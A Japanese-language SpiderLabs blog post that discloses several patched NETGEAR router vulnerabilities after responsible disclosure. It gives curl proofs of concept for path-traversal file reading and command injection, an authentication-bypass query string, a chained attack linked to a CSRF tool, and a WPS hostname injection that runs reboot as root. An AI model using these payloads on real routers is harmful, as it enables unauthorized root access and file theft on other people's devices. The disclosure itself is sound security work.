ブログとストーリー

SpiderLabsブログ

年間50万人以上の読者を魅了しているブログがセキュリティ コミュニティの主要目的地になっているのは、最新の脅威の技術的な分析、重要な脆弱性に関する開示、最先端の研究が掲載されているからです。

NETGEAR 製ルータにおける複数の脆弱性

昨年私は、NETGEAR 製品の複数の脆弱性を発見しました。これらの脆弱性に関する情報の開 示プロセスが終了し、さらにパッチが適用されましたので、今では技術的な詳細について述べるこ とができます。

 

TWSL2018-002: 一部のルーターおよびモデム・ルーターでのパスワードリカバリーとファイルア クセス

Trustwave SpiderLabs Advisory: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-002/?fid=10670

NETGEAR advisory: https://kb.netgear.com/000045848/Security-Advisory-for-Password-Recovery-and-File-Access-on-Some-Routers-and-Modem-Routers-PSV-2017-0677

ルータの中には、ファイルへのパスがわかっていれば、デバイスからの任意のファイルの読み取り を許可するものがあります。ファームウェア 1.0.2.86 以前が搭載されている Nighthawk X8 に対す る概念実証:

curl -d "id=304966648&next_file=cgi-bin/../../tmp/mnt/usb0/part1/README.txt" http://192.168.1.1/genie_restoring.cgi?id=304966648

T上記は、ルータに挿入された USB メモリにある README.txt ファイルを取得します。合計 17 の 製品が影響を受けます。具体的なモデルはアドバイザリーノートに記載されています。

 

TWSL2018-003: 発見事象 1: 一部のルーターおよびモデム・ルーターでの認証後のコマンドイン ジェクション

Trustwave SpiderLabs Advisory: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-003/?fid=10671

NETGEAR advisory: https://kb.netgear.com/000045850/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-and-Modem-Routers-PSV-2017-1207

これは、NETGEAR のアドバイザリーによると 6 つの製品に影響します。lan.cgi ページの device_name パラメータを使用してルートレベルの OS コマンドを実行すると発生すること:

curl -d "action=Apply&device_name=A%22+%26%26+touch+%2Ftmp%2Fjimmers+%26%26+echo+%22B&sysLANIPAddr1=192&sysLANIPAddr2=168&sysLANIPAddr3=1&sysLANIPAddr4=1&sysLANSubnetMask1=255&sysLANSubnetMask2=255&sysLANSubnetMask3=255&sysLANSubnetMask4=0&rip_direction=1&sysRIPVersion=Disabled&dhcp_server=dhcp_server&sysPoolStartingAddr4=2&sysPoolFinishAddr4=254&select=-1&arp_enable=disable&ipmac_token=0&dev_name=R8500mge&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&rip_enable=0&rip_multicast=1" http://192.168.1.1/lan.cgi?id=988337b27ba1f3cdc280e454860f8b10d84e42da

この攻撃には認証が必要であることに注目してください。

 

TWSL2018-003: 発見事象 2: 一部のルーターまたはモデム・ルーターでの認証バイパス

NETGEAR advisory: https://kb.netgear.com/000048998/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-or-Modem-Routers-PSV-2017-1208

これはまた、多数の製品(合計 17 個)に影響を及ぼし、悪用するのは簡単です。クエリ文字列内 に ”&genie = 1” がある場合、認証はバイパスされます。

 

TWSL2018-003: 連鎖攻撃: 一部のルーターおよびモデム・ルーターに対するコマンドインジェク ション

NETGEAR advisory: https://kb.netgear.com/000048999/Security-Advisory-for-Command-Injection-on-Some-Routers-and-Modem-Routers-PSV-2017-1209

同じ製品が影響を受けます。これは 3 つの別々の問題を利用した 3 段階の攻撃です:CSRF トー クンリカバリーの脆弱性(助けとなるツール: https://github.com/SpiderLabs/advisories-poc/blob/master/TWSL2018-003/csrf.c)と TWSL2018-003 での 2 つの発見事象。その結果、 ルーターに接続されているユーザーは、資格情報を提供せずに、デバイスのルートとして OS コマ ンドを実行できます。

 

TWSL2018-004: D7000, EX6200v2、および一部のルータでのコマンドインジェクションの脆弱 性

Trustwave SpiderLabs Advisory: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2018-004/?fid=10672

NETGEAR advisory: https://kb.netgear.com/000049354/Security-Advisory-for-Command-Injection-Vulnerability-on-D7000-EX6200v2-and-Some-Routers-PSV-2017-2181

6 つの製品のみが影響を受けます。これにより、WPS がアクティブになっている短時間の間に root として OS コマンドを実行できます。証明するには、あなたの Linux ボックスの /etc/wpa_supplicant.conf ファイルに次の行を追加し、ルータで初期化された WPS に参加してみ てください。

(Nighthawk X4S):
device_name=MR" /sbin/reboot "

ルータの再起動を観察してください!これは、WPS の一部として実行される内部コードがホスト名 をサニタイズできないために発生します。

Trustwave SpiderLabs は、これらの脆弱性が確実に対処されていることを確認するため、当社 の責任ある開示プロセスを通じて NETGEAR 社と協力してきました。NETGEAR 社に感謝すると ともに、コミュニケーション能力の高い PSIRT チームに感謝したいと思います。 バグ発見に対する 報奨制度 を彼らが採用することは、このような問題に対処するための内部プロセスを改善するの に役立っていることは明らかです。

NETGEAR 社のアドバイザリページでルータモデルに該当するファームウェアを確認し、影響を受 けるデバイスにパッチが適用されていることを確認してください。